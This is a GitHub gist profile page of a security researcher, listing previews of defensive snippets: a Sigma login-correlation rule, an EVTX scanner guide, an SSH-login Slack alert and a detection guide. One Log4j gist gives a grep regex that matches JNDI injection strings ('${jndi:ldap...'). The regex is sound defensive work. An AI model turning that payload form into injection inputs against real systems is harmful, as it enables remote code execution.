Skip to content

Instantly share code, notes, and snippets.

View Neo23x0's full-sized avatar

Florian Roth Neo23x0

View GitHub Profile
Neo23x0 / sigma_correlation_failed_login_success.yml
Last active December 4, 2023 10:00
Sigma - Correlation Rule
title: Correlation - Multiple Failed Logins Followed by Successful Login
id: b180ead8-d58f-40b2-ae54-c8940995b9b6
status: experimental
description: Detects multiple failed logins by a single user followed by a successful login of that user
author: Florian Roth (Nextron Systems)
date: 2023/06/16
type: temporal
Neo23x0 /
Last active May 12, 2024 12:09
Guide to Use Sigma EVTX Checker

Guide to Use Nextron's Sigma EVTX Checker

It's a fast go-based scanner for Linux, Windows, and macOS that applies Sigma rules and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone
cd sigma
Neo23x0 /
Created December 18, 2022 18:48
My Link List
Neo23x0 /
Last active August 1, 2023 21:53
Collection of Deleted Articles on MDSec's Nighthawk
Neo23x0 /
Created September 11, 2022 21:22
Slack Hook - System Logon
#!/bin/bash -x
source=$(echo "$SSH_CONNECTION" | cut -d' ' -f 1)
geo=$(geoiplookup "$source")
curl -X POST --silent --data "payload={\"text\": \":bust_in_silhouette: SYSTEM: $hostname USER: $USER SOURCE: $source GEO: $geo\"}" > /dev/null
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
Neo23x0 /
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs
Neo23x0 /
Last active June 24, 2024 22:11
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
Neo23x0 /
Last active December 11, 2021 11:15
Minecraft with SEUS Shader - Guide
Neo23x0 /
Last active July 30, 2023 12:19
Offensive Research Guide to Help Defense Improve Detection

I've transformed this gist into a git repository.

Whenever you research a certain vulnerability ask yourself these questions and please answer them for us


Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)